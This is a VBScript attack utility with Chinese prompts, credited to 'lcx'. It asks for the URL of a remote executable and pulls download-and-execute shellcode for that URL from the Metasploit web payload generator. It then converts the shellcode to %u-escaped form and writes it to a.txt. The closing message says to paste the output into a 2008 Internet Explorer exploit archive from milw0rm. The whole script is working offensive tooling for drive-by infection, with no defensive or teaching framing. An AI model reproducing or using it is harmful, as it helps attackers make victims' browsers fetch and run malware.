'code by lcx

On Error Resume Next

Exeurl = InputBox( "请输入exe的地址：", "输入", "http://www.haiyangtop.net/333.exe" )

url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)

Set Re = New RegExp

Re.Pattern = "($shellcode =[sS]+</div></pre>)"

Set Matches = Re.Execute(Body)

If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

function replaceregex(str)

set regex=new regExp

regex.pattern="x(..)x(..)"

regex.IgnoreCase=true

regex.global=true

matches=regex.replace(str,"%u$2$1")

replaceregex=matches

end Function

Function getHTTPPage(Path)

t = GetBody(Path)

getHTTPPage = BytesToBstr(t, "GB2312")

End Function

Function GetBody(url)

On Error Resume Next

Set Retrieval = CreateObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", url, False, "", ""

.Send

GetBody = .ResponseBody

End With

Set Retrieval = Nothing

End Function

Function BytesToBstr(Body, Cset)

Dim objstream

Set objstream = CreateObject("adodb.stream")

objstream.Type = 1

objstream.Mode = 3

objstream.Open

objstream.Write Body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = Cset

BytesToBstr = objstream.ReadText

objstream.Close

Set objstream = Nothing

End Function

Function URLEncoding(vstrIn)

strReturn = ""

For aaaa = 1 To Len(vstrIn)

ThisChr = Mid(vStrIn,aaaa,1)

If Abs(Asc(ThisChr)) < &HFF Then

strReturn = strReturn & ThisChr

Else

innerCode = Asc(ThisChr)

If innerCode < 0 Then

innerCode = innerCode + &H10000

End If

Hight8 = (innerCode And &HFF00) &HFF

Low8 = innerCode And &HFF

strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)

End If

Next

URLEncoding = strReturn

End Function

set fso=CreateObject("scripting.filesystemobject")

set fileS=fso.opentextfile("a.txt",2,true)

fileS.writeline replaceregex(code)

'fileS.writeline body

wscript.echo replaceregex(code)

files.close

set fso=Nothing

wscript.echo Chr(13)&"ok，生成a.txt，请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"